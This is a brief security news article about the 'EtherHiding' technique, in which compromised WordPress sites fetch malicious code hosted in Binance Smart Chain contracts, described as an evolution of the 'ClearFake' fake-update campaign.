Hackers have devised a novel way to embed malicious code in Binance smart contracts to steal partial payments from blockchain contracts.
Dubbed “EtherHiding” by Guardio Labs researchers, the attack involves compromising WordPress websites by implanting code that retrieves partial payloads from blockchain contracts, subsequently deploying these payloads within BSC smart contracts. These smart contracts effectively function as clandestine, anonymous hosting platforms for malicious code.
EtherHiding is said to be an evolution of a “fake-update” malware propagation campaign named “ClearFake,” where the attackers inserted a concealed JS code in compromised WordPress sites. This code allowed the campaign operators to remotely and instantly change attack methods and display any message they desire like overlays demanding a browser update ultimately resulting in the malware infection.
According to the researchers, EtherHiding’s flexibility enables hackers to modify the attack chain with each new blockchain transaction, making it challenging to mitigate.
“Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted “on-chain” without the ability for a takedown,” the researchers noted. “This is what we see here in this attack — malicious code is hosted and served in a manner that can’t be blocked.”
Once a smart contract is deployed on BSC, it operates autonomously. Binance can’t just “shut it down.” The only thing the company can do and currently offers — is the ability of the community and developers to be warned about a contract if identified as malicious or part of an illegal activity, Guardio Labs added.